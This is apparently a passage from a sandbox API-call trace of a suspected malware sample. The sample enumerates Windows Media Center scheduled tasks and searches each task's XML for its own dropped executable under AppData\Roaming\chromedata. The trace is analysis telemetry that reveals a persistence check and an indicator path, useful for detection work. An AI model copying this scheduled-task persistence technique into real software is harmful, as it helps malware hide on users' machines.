Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/OCURActivate</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.284] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\OCURActivate</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/OCURActivate</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.302] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.302] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0xa, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.302] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="OCURDiscovery") returned 0x0
	[0099.302] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\OCURDiscovery</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/OCURDiscovery $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.305] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\OCURDiscovery</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/OCURDiscovery $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.323] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.323] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0xb, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.323] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="PBDADiscovery") returned 0x0
	[0099.323] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscovery</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.326] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscovery</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.345] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.345] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0xc, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.345] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="PBDADiscoveryW1") returned 0x0
	[0099.345] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscoveryW1</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/wait:7 /PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.348] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscoveryW1</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/wait:7 /PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.374] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.374] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0xd, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.374] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="PBDADiscoveryW2") returned 0x0
	[0099.374] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscoveryW2</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/wait:90 /PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.377] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscoveryW2</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/wait:90 /PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.402] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.402] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0xe, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.403] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="PeriodicScanRetry") returned 0x0
	[0099.403] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemRoot%\\ehome\\ehrecvr.exe,-104)</Source>\r\n    <Date>2008-07-06T05:40:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehrecvr.exe,-103)</Description>\r\n    <URI>\\Microsoft\\Windows\\Media Center\\PeriodicScanRetry</URI>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger id=\"Next Periodic Scan\">\r\n      <StartBoundary>2006-09-09T17:33:00</StartBoundary>\r\n      <Enabled>false</Enabled>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%windir%\\ehome\\MCUpdate.exe</Command>\r\n      <Arguments>-pscn 0</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.406] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemRoot%\\ehome\\ehrecvr.exe,-104)</Source>\r\n    <Date>2008-07-06T05:40:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehrecvr.exe,-103)</Description>\r\n    <URI>\\Microsoft\\Windows\\Media Center\\PeriodicScanRetry</URI>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger id=\"Next Periodic Scan\">\r\n      <StartBoundary>2006-09-09T17:33:00</StartBoundary>\r\n      <Enabled>false</Enabled>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%windir%\\ehome\\MCUpdate.exe</Command>\r\n      <Arguments>-pscn 0</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.435] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.435] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0xf, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.435] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="PvrRecoveryTask") returned 0x0
	[0099.435] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PvrRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-129)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-130)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-PvrRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.437] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PvrRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-129)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-130)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-PvrRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.461] IUnknown:Release (This=0x63ff70) returned 0x0
